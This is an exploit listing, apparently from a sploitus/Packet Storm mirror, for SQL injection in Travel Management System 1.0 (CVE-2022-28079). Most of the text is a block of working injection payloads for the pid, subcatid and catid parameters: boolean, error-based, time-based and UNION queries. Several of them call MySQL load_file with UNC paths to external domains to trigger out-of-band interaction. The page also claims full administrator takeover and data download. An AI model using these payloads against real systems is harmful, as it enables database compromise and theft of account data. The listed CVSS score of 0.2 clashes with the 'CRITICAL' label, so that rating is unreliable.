Exploit for Travel Management System 1.0 SQL Injection CVE-2022-28079

Name: Exploit for Travel Management System 1.0 SQL Injection CVE-2022-28079
Rating: 5 (161 reviews)
2022-05-09 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:166997
## Title: Travel Management System 1.0 Multiple SQLi  
## Author: nu11secur1ty  
## Date: 05.07.2022  
## Vendor: https://code-projects.org/author/fabian/  
## Software: https://code-projects.org/travel-management-system-using-php-source-code/  
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079  
  
  
  
## Description:  
The pid, subcatid and catid parameters appear to be vulnerable to SQL  
injection attacks.  
The payload '+(select  
load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'  
was submitted in the all parameters.  
This payload injects a SQL sub-queries that call MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take administrator accounts control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: pid (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: pid=12'+(select  
load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''  
OR NOT 1485=1485 AND 'nTcz'='nTcz  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: pid=12'+(select  
load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''  
OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT  
(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: pid=12'+(select  
load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''  
AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 4 columns  
Payload: pid=12'+(select  
load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''  
UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#  
---  
  
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
---  
Parameter: subcatid (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: subcatid=7'+(select  
load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''  
AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT  
(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: subcatid=7'+(select  
load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''  
AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 4 columns  
Payload: subcatid=7'+(select  
load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''  
UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#  
---  
  
  
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
---  
Parameter: catid (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: catid=3'+(select  
load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''  
AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT  
(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: catid=3'+(select  
load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''  
AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 4 columns  
Payload: catid=3'+(select  
load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''  
UNION ALL SELECT  
NULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)  
  
## Proof and Exploit:  
[href](https://streamable.com/8nroqp)